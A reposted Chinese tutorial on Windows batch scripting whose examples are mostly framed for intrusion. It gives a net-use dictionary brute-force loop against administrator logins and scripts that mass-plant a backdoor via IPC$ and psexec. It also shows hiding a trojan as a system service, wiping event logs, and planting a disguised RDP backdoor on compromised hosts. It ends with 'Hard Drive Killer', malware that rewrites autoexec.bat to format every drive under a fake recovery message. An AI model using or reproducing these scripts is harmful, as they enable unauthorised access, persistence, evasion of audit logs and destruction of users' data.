Windows 批次檔介紹使用
轉載至 http://tw.myblog.yahoo.com/jw!9skfwiSAHxQ7c8D8luphjfve/article?mid=942
簡單批處理內定指令簡介
1.Echo 指令
開啟回顯或關閉請求回顯功能,或顯示消息。若果沒有任何參數,echo 指令將顯示目前回顯設定。
語法
echo [{on|off}] [message]
Sample:@echo off / echo hello world
在實際套用中我們會把這條指令和重定向符號(也稱為管道符號,一般用> >> ^)結合來實現輸入一些指令到特定格式的檔案中.這將在以後的例子中體現出來。
2.@ 指令
表示不顯示@後面的指令,在入侵過程中(例如使用批處理來格式化敵人的硬碟)自然不能讓對方看到你使用的指令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 這個指令是不可以使用/y這個參數的,可喜的是微軟留了個autoset這個參數給我們,效果和/y是一樣的。)
3.Goto 指令
指定跳轉到標籤,找到標籤後,程式將處理從下一行開始的指令。
語法:goto label (label是參數,指定所要轉向的批處理程式中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(若果這裡的if、%1、%2你不明白的話,先略過去,後面會有詳細的解釋。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標籤的名字可以隨便起,但是最好是有意義的字母啦,字母前加個:用來表示這個字母是標籤,goto指令就是根據這個:來尋找下一步前往到那裡。最好有一些說明這樣你別人看起來才會理解你的意圖啊。
4.Rem 指令
註釋指令,在C語系中相當與/*--------*/,它並不會被執行,只是起一個註釋的作用,便於別人閱讀和你自己日後修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 指令
執行 Pause 指令時,將顯示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:back
echo Please put a new disk into driver A
pause
goto begin
在這個例子中,磁碟機 A 中磁碟上的所有檔案均複製到d:back中。顯示的註釋提示您將另一張磁碟放入磁碟機 A 時,pause 指令會使程式掛起,以便您更換磁碟,然後按任意鍵繼續處理。
6.Call 指令
從一個批處理程式呼叫另一個批處理程式,並且不終止父批處理程式。call 指令接受用作呼叫目的的標籤。若果在腳本或批處理檔案外使用 Call,它將不會在指令行起作用。
語法
call [Drive:][Path] FileName [BatchParameters] [:label [arguments]
參數
[Drive:}[Path] FileName
指定要呼叫的批處理程式的位置和名稱。filename 參數必須具有 .bat 或 .cmd 副檔名。
7.start 指令
呼叫外部程式,所有的DOS指令和指令行程式都可以由start指令來呼叫。
入侵常用參數:
MIN 開始時視窗最小化
SEPARATE 在分開的空間內開始 16 位 Windows 程式
HIGH 在 HIGH 優先級類別開始套用程式
REALTIME 在 REALTIME 優先級類別開始套用程式
WAIT 啟動套用程式並等候它結束
parameters 這些為傳輸到指令/程式的參數
執行的套用程式是 32-位 GUI 套用程式時,CMD.EXE 不等套用程式終止就返回指令提示。若果在指令腳本內執行,該新行為則不會發生。
8.choice 指令
choice 使用此指令可以讓使用者輸入一個字元,從而執行不同的指令。使用時應該加/c:參數,c:後應寫提示可輸入的字元,之間無空格。它的返回碼為1234……
如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的內容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (應先判斷數值最高的錯誤碼)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:dosdefrag
goto end
:mem
mem
goto end
:end
echo good bye
此檔案執行後,將顯示 defrag,mem,end[D,M,E]? 使用者可選取d m e ,然後if語句將作出判斷,d表示執行標號為defrag的程式段,m表示執行標號為mem的程式段,e表示執行標號為end的程式段,每個程式段最後都以goto end將程式前往end標號處,然後程式將顯示good bye,檔案結束。
9.If 指令
if 表示將判斷是否符合規定的條件,從而決定執行不同的指令。 有三種格式:
1、if "參數" == "字串" 待執行的指令
參數若果等於特殊的字串,則條件成立,執行指令,否則執行下一句。(注意是兩個等號)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2、if exist 檔案名 待執行的指令
若果有特殊的檔案,則條件成立,執行指令,否則執行下一句。
如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 數字 待執行的指令
若果返回碼等於特殊的數字,則條件成立,執行指令,否則執行下一句。
如if errorlevel 2 goto x2
DOS程式執行時都會返回一個數字給DOS,稱為錯誤碼errorlevel或稱返回碼,常見的返回碼為0、1。
10.for 指令
for 指令是一個比較複雜的指令,主要用於參數在特殊的範圍內循環執行指令。
在批處理檔案中使用 FOR 指令時,指定變量請使用 %%variable
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個單一字母可置換的參數。
(set) 指定一個或一群組檔案。可以使用關鍵字。
command 指定對每個檔案執行的指令。
command-parameters 為特定指令指定參數或指令行開關。
在批處理檔案中使用 FOR 指令時,指定變量請使用 %%variable
而不要用 %variable。變量名稱是區分大小寫的,所以 %i 不同於 %I
若果指令副檔名被啟用,下列額外的 FOR 指令格式會受到
支援:
FOR /D %variable IN (set) DO command [command-parameters]
若果集中包括關鍵字,則指定與目錄名符合,而不與檔案
名符合。
FOR /R [drive:]path] %variable IN (set) DO command [command-
檢查以 [drive:]path 為根的目錄樹,指向每個目錄中的
FOR 語句。若果在 /R 後沒有指定目錄,則使用目前
目錄。若果集僅為一個單點(.)字元,則枚舉該目錄樹。
FOR /L %variable IN (start,step,end) DO command [command-para
該集表示以增量形式從開始到結束的一個數字序列。
因此,(1,1,5) 將產生序列 1 2 3 4 5,(5,-1,1) 將產生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
或是,若果有 usebackq 選項:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
filenameset 為一個或多個檔案名。繼續到 filenameset 中的
下一個檔案之前,每份檔案都已被開啟、讀取並經由處理。
處理內含讀取檔案,將其分成一行行的文字,然後將每行
解析成零或更多的符號。然後用已找到的符號字串變量值
呼叫 For 循環。以預設模式,/F 通過每個檔案的每一行中分開
的第一個空白符號。略過空白行。您可通過指定可選 "options"
參數替代預設解析動作。這個帶引號的字串內含一個或多個
指定不同解析選項的關鍵字。這些關鍵字為:
eol=c - 指一個行註釋字元的結尾(就一個)
skip=n - 指在檔案開始時忽略的行數。
delims=xxx - 指分隔符集。這個置換了空格和跳格鍵的
預設分隔符集。
tokens=x,y,m-n - 指每行的哪一個符號被傳遞到每個迭代
的 for 本身。這會導致額外變量名稱的
格式為一個範圍。通過 nth 符號指定 m
符號字串中的最後一個字元星號,
那麼額外的變量將在最後一個符號解析之
分配並接受行的保留文字。
usebackq - 指定新語法已在下類情況中使用:
在作為指令執行一個後引號的字串並且
引號字元為文字字串指令並容許在 fi
中使用雙引號擴起檔案名稱。
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
會分析 myfile.txt 中的每一行,忽略以分號打頭的那些行,將
每行中的第二個和第三個符號傳遞給 for 程式體;用逗號和/或
空格定界符號。請注意,這個 for 程式體的語句引用 %i 來
取得第二個符號,引用 %j 來取得第三個符號,引用 %k
來取得第三個符號後的所有剩餘符號。對於帶有空格的檔案
名,您需要用雙引號將檔案名括起來。為了用這種模式來使
用雙引號,您還需要使用 usebackq 選項,否則,雙引號會
被理解成是用作定義某個要分析的字串的。
%i 專門在 for 語句中得到說明,%j 和 %k 是通過
tokens= 選項專門得到說明的。您可以通過 tokens= 一行
指定最多 26 個符號,只要不試圖說明一個高於字母 'z' 或
'Z' 的變量。請記住,FOR 變量是單一字母、分大小寫和全局的;
同時不能有 52 個以上都在使用中。
您還可以在相鄰字串上使用 FOR /F 分析邏輯;方法是,
用單引號將括號之間的 filenameset 括起來。這樣,該字元
串會被當作一個檔案中的一個單一輸入行。
最後,您可以用 FOR /F 指令來分析指令的輸出。方法是,將
括號之間的 filenameset 變成一個反括字串。該字串會
被當作指令行,傳遞到一個子 CMD.EXE,其輸出會被抓進
記憶體,並被當作檔案分析。因此,以下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉目前環境中的環境變量名稱。
另外,FOR 變量參照的置換已被增強。您現在可以使用下列
選項語法:
~I - 刪除任何引號("),擴充 %I
%~fI - 將 %I 擴充到一個完全合格的路徑名
%~dI - 僅將 %I 擴充到一個磁碟機號
%~pI - 僅將 %I 擴充到一個路徑
%~nI - 僅將 %I 擴充到一個檔案名
%~xI - 僅將 %I 擴充到一個檔案副檔名
%~sI - 擴充的路徑只含有短名
%~aI - 將 %I 擴充到檔案的檔案屬性
%~tI - 將 %I 擴充到檔案的日期/時間
%~zI - 將 %I 擴充到檔案的大小
%~$PATH:I - 尋找列在路徑環境變量的目錄,並將 %I 擴充
到找到的第一個完全合格的名稱。若果環境變量
未被定義,或是沒有找到檔案,此群組合鍵會擴充
空字串
可以群組合修飾符來得到多重結果:
%~dpI - 僅將 %I 擴充到一個磁碟機號和路徑
%~nxI - 僅將 %I 擴充到一個檔案名和副檔名
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名
%~dp$PATH:i - 尋找列在路徑環境變量的目錄,並將 %I 擴充
到找到的第一個磁碟機號和路徑。
%~ftzaI - 將 %I 擴充到類似輸出線路的 DIR
在以上例子中,%I 和 PATH 可用其他有效數值代替。%~ 語法
用一個有效的 FOR 變量名終止。選取類似 %I 的大寫變量名
比較易讀,而且避免與不分大小寫的群組合鍵混淆。
以上是MS的官方幫助,下面我們舉幾個例子來具體說明一下For指令在入侵中的用途。
sample2:
利用For指令來實現對一台目的Win2k主電腦的暴力密碼破解。
我們用net use \ipipc$ "password" /u:"administrator"來嘗試這和目的主電腦進行連線,當成功時記下密碼。
最主要的指令是一條:for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator"
用i%來表示admin的密碼,在dict.txt中這個取i%的值用net use 指令來連線。然後將程式執行結果傳遞給find指令--
for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"|find ":指令成功完成">>D:ok.txt ,這樣就ko了。
sample3:
你有沒有過手裡有大量肉雞等著你去種後門+木馬呢?,當數量特別多的時候,原本很開心的一件事都會變得很鬱悶:)。文章開頭就談到使用批處理檔案,可以簡化日常或重複性任務。那麼如何實現呢?呵呵,看下去你就會明白了。
主要指令也只有一條:(在批處理檔案中使用 FOR 指令時,指定變量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1,在這裡它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。
而cultivate.bat無非就是用net use指令來建立IPC$連線,並copy木馬+後門到victim,然後用返回碼(If errorlever =)來篩選成功種植後門的主電腦,並echo出來,或是echo到特殊的檔案。
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裡你也一定明白這victim.txt裡的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排序,一般就是 ip password username。
代碼雛形:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \%1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \%1 c:winntsystem32windrv32.exe
@psexec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
這只是一個自動種植後門批處理的雛形,兩個批處理和後門程式(Windrv32.exe),PSexec.exe需放在統一目錄下.批處理內容
尚可延伸,例如:加入清除日誌+DDOS的功能,加入定時加入使用者的功能,更深入一點可以使之具備自動傳播功能(蠕蟲).此處不多做敘述,有興趣的朋友可自行研究.
二.如何在批處理檔案中使用參數
批處理中可以使用參數,一般從1%到 9%這九個,當有多個參數時需要用shift來移動,這種情況並不多見,我們就不考慮它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用於連續地格式化幾張軟碟,所以用的時候需在dos視窗輸入fomat.bat a,呵呵,好像有點畫蛇添足了~^_^
sample2:
當我們要建立一個IPC$連線地時候總要輸入一大串指令,弄不好就打錯了,所以我們不如把一些固定指令寫入一個批處理,把肉雞地ip password username 當著參數來賦給這個批處理,這樣就不用每次都打指令了。
@echo off
@net use \1%ipc$ "2%" /u:"3%" 注意哦,這裡PASSWORD是第二個參數。
@if errorlevel 1 echo connection failed
怎麼樣,使用參數還是比較簡單的吧?你這麼帥一定學會了^_^.
三.如何使用群組合指令(Compound Command)
1.&
Usage:第一條指令 & 第二條指令 [& 第三條指令...]
用這種方法可以同時執行多條指令,而不管指令是否執行成功
Sample:
C:>dir z: & dir c:Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage:第一條指令 && 第二條指令 [&& 第三條指令...]
用這種方法可以同時執行多條指令,當碰到執行出錯的指令後將不執行後面的指令,若果一直沒有出錯則一直執行完所有指令;
Sample:
C:>dir z: && dir c:Ex4rch
The system cannot find the path specified.
C:>dir c:Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
在做備份的時候可能會用到這種指令會比較簡單,如:
dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup
若果遠端伺服器上存在backup.mdb檔案,就執行copy指令,若不存在該檔案則不執行copy指令。這種用法可以置換IF exist了 :)
3.||
Usage:第一條指令 || 第二條指令 [|| 第三條指令...]
用這種方法可以同時執行多條指令,當碰到執行正確的指令後將不執行後面的指令,若果沒有出現正確的指令則一直執行完所有指令;
Sample:
C:Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
群組合指令使用的例子:
sample:
@copy trojan.exe \%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
四、管道指令的使用
1.| 指令
Usage:第一條指令 | 第二條指令 [| 第三條指令...]
將第一條指令的結果作為第二條指令的參數來使用,記得在unix中這種模式很常見。
sample:
time /t>>D:IP.log
netstat -n -p tcp|find ":3389">>D:IP.log
start Explorer
看出來了麼?用於終端服務容許我們為使用者自訂起始的程式,來實現讓使用者執行下面這個bat,以獲得登入使用者的IP。
2.>、>>輸出重定向指令
將一條指令或某個程式輸出結果的重導至特定檔案中, > 與 >>的區別在於,>會清除調原有檔案中的內容後寫入指定檔案,而>>只會追加內容到指定檔案中,而不會改動其中的內容。
sample1:
echo hello world>c:hello.txt (stupid example?)
sample2:
時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那裡鑽,DLL馬也不例外,針對這一點我們可以在安裝好系統和必要的套用程式後,對該目錄下的EXE和DLL檔案作一個記錄:
執行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
這樣所有的EXE和DLL檔案的名稱都被分別記錄到exeback.txt和dllback.txt中,
日後如發現異常但用傳統的方法查不出問題時,則要考慮是不是系統中已經潛入DLL木馬了.
這時我們用同樣的指令將system32下的EXE和DLL檔案記錄到另外的exeback1.txt和dllback1.txt中,然後執行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC指令比較前後兩次的DLL和EXE檔案,並將結果輸入到diff.txt中),這樣我們就能發現一些多出來的DLL和EXE檔案,然後通過檢視建立時間、版本、是否經由壓縮等就能夠比較容易地判斷出是不是已經被DLL木馬光顧了。沒有是最好,若果有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將後門DLL檔案註銷掉,再把它移到資源回收筒裡,若系統沒有異常反映再將之徹底刪除或是提交給掃毒軟體公司。
3.< 、>& 、<&
< 從檔案中而不是從鍵盤中讀入指令輸入。
>& 將一個控制碼的輸出寫入到另一個控制碼的輸入中。
<& 從一個控制碼讀取輸入並將其寫入到另一個控制碼輸出中。
這些並不常用,也就不多做介紹。
五.如何用批處理檔案來動作註冊表
在入侵過程中經常回動作註冊表的特定的鍵值來實現一定的目的,例如:為了達到隱藏後門、木馬程式而刪除Run下殘餘的鍵值。或是建立一個服務用以加載後門。當然我們也會修改註冊表來加固系統或是改變系統的某個屬性,這些都需要我們對註冊表動作有一定的瞭解。下面我們就先學習一下如何使用.REG檔案來動作註冊表.(我們可以用批處理來生成一個REG檔案)
關於註冊表的動作,常見的是建立、修改、刪除。
1.建立
建立分為兩種,一種是建立次基碼(Subkey)
我們建立一個檔案,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]
然後執行該腳本,你就已經在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下建立了一個名字為「hacker」的次基碼。
另一種是建立一個項目名稱
那這種檔案格式就是典型的檔案格式,和你從註冊表中匯出的檔案格式一致,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"Door"=C:\WINNT\system32\door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下
新增了:Invader、door、about這三個項目
Invader的類型是「String Value」
door的類型是「REG SZ Value」
Autodos的類型是「DWORD Value」
2.修改
修改相對來說比較簡單,只要把你需要修改的項目匯出,然後用記事本進行修改,然後匯入(regedit /s)即可。
3.刪除
我們首先來說說刪除一個項目名稱,我們建立一個如下的檔案:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Ex4rch"=-
執行該腳本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的"Ex4rch"就被刪除了;
我們再看看刪除一個次基碼,我們建立一個如下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
執行該腳本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已經被刪除了。
相信看到這裡,.reg檔案你基本已經掌握了。那麼現在的目的就是用批處理來建立特定內容的.reg檔案了,記得我們前面說道的利用重定向符號可以很容易地建立特定類型的檔案。
samlpe1:如上面的那個例子,如想生成如下註冊表檔案
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要這樣:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\WINNT\system32\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我們現在在使用一些比較老的木馬時,可能會在註冊表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程式的路徑,從而導致木馬被查殺,相對地若是將木馬程式註冊為系統服務則相對安全一些.下面以組態好地IRC木馬DSNX為例(名為windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在註冊表中的啟動項,用sc.exe將之註冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀,並config為自啟動]
@REM 這樣不是更安全^_^.
六.精彩案例放送。
1.刪除win2k/xp系統預設共享的批處理
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:delshare.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg
echo "AutoShareWks"=dword:00000000>> c:delshare.reg
echo "AutoShareServer"=dword:00000000>> c:delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:delshare.reg
echo Deleting the temprotarily files.
del c:delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file ---------------------------
2.全面加固系統(給肉雞打補丁)的批處理檔案
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登入]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及檔案訪問和列印共享]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登入前關機]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止顯示前一個登入使用者名稱]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file ---------------------------
下面指令是清除肉雞所有日誌,禁止一些危險的服務,並修改肉雞的terminnal service留跳後路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:winntsystem32logfilesw3svc1*.* /f /q
@del c:winntsystem32logfilesw3svc2*.* /f /q
@del c:winntsystem32config*.event /f /q
@del c:winntsystem32dtclog*.* /f /q
@del c:winnt*.txt /f /q
@del c:winnt*.log /f /q
@net start w3svc
@net start event log
@rem [刪除日誌]
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危險的服務。]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows' message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe
@REM [修改3389連線,連接埠為8210(十六進位為00002012),名稱為Microsoft EventLog,留條後路]
3.Hard Drive Killer Pro Version 4.0(玩批處理到這個水平真的不容易了。)
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's d*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:Sampledrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c
:form_del
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
